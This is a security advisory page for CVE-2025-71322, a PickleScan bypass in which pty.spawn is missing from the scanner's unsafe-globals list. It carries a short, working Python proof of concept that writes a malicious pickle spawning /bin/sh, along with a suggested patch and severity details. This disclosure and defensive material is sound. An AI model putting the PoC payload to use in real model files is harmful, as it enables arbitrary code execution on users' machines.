🛡️ CVE-2025-71322 — picklescan

🟠 CVSS 8.8 — High ✅ No Known Exploit CWE-693 NVD
8.8
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Picklescan Bypasses Unsafe Globals Check using pty.spawn

Summary

The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.

Details

For 2025's [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.

The intended way was to use pty.spawn but some players found alternative solutions.

PoC

  • Run the following Python code to generate the PoC pickle file.

```py

import pickle

command = b"/bin/sh"

payload = b"".join(

[

pickle.PROTO + pickle.pack("B", 4),

pickle.MARK,

pickle.GLOBAL + b"pty\n" + b"spawn\n",

pickle.EMPTY_LIST,

pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,

pickle.APPEND,

# Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes

pickle.OBJ,

pickle.STOP,

]

)

with open("dump.pkl", "wb") as f:

f.write(payload)

```

  • Run PickleScan on the generated pickle file.

<img width="936" height="311" alt="picklescan_bypass_pty_spawn" src="https://github.com/user-attachments/assets/0d6430e4-a7e5-461c-9d75-c607f6886c9f" />

PickleScan detects the pty.spawn global as "suspicious" but not "dangerous", allowing it to be loaded.

Impact

Severity: High

Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.

Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the pty.spawn function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.

Suggested Patch

```

diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py

index 34a5715..b434069 100644

--- a/src/picklescan/scanner.py

+++ b/src/picklescan/scanner.py

@@ -150,6 +150,7 @@ _unsafe_globals = {

"_pickle": "*",

"pip": "*",

"profile": {"Profile.run", "Profile.runctx"},

+ "pty": "spawn",

"pydoc": "pipepager", # pydoc.pipepager('help','echo pwned')

"timeit": "*",

"torch._dynamo.guards": {"GuardBuilder.get"},

```

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity high, availability high.

Weakness class

CVE-2025-71322 is classified as CWE-693: Protection Mechanism Failure. A protection exists but does not cover the case at hand, so it can be worked around.

Affected software

CVE-2025-71322 is recorded against 2 packages.

  • picklescan (fixed in 0.0.33)
  • unknown

Timeline and source

Published on 29 December 2025 and last revised on 7 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)
www.vulncheck.com (Web)

Details

Severity HIGH
CVSS Score 8.8
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE CWE-693
Public Exploit ✅ No
Source NVD
Published 2025-12-29
Updated 2026-08-12
Modified 2026-07-07
Fix URL N/A

Affected Packages

Software From version Fixed in
picklescan 0.0.33
unknown

Similar Threats

Site Security Check

Is picklescan part of your stack?

CVE-2025-71322 is rated CVSS 8.8 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.